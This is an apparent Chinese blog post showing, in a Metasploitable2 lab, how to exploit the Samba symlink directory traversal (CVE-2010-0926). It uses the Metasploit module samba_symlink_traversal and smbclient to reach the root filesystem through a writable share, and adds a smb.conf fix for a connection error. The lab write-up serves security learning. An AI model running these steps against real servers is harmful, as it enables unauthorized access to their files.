您当前的位置: 首页 > 

星球守护者

暂无认证

  • 1浏览

    0关注

    641博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

Metasploitable2靶机之第五篇--Samba sysmlink 默认配置目录遍历漏洞(CVE-2010-0926)

星球守护者 发布时间:2021-04-02 21:51:46 ,浏览量:1

文章目录
      • 环境
      • 原理
      • 漏洞复现
          • 第一步 发现漏洞
          • 第二步 ,启动metasploit
          • 第三步选择漏洞库
          • 第四步 设置参数,开始攻击
          • 第五步 利用成功,打开共享目录
          • 注意 smbclient 报错:
      • 摘抄

环境 主机地址Metasploitable2192.168.232.202kali-linux192.168.232.129 原理 漏洞复现 第一步 发现漏洞

在这里插入图片描述

第二步 ,启动metasploit
msfconsole

在这里插入图片描述

第三步选择漏洞库
search samba
use auxiliary/admin/smb/samba_symlink_traversal

在这里插入图片描述 在这里插入图片描述

第四步 设置参数,开始攻击
show options
Set RHOST 192.168.232.202 设置要攻击的IP
set SMBSHARE tmp 设置SAM可写文件
exploit

在这里插入图片描述

第五步 利用成功,打开共享目录
smbclient //192.168.232.202/tmp 直接回车,不用输入密码
cd rootfs

在这里插入图片描述

注意 smbclient 报错:

protocol negotiation failed: NT_STATUS_CONNECTION_RESET

打开/etc/samba/smb.conf文件,在global标签下增加如下两个参数项:

client min protocol = CORE
client max protocol = SMB3

在这里插入图片描述

摘抄 所谓完美,

就是耳机音量刚好盖过外界的噪音,

闹钟响起时你刚好自然醒,

你爱的人刚好也爱你。

关注
打赏
1662051426
查看更多评论
立即登录/注册

微信扫码登录

0.0803s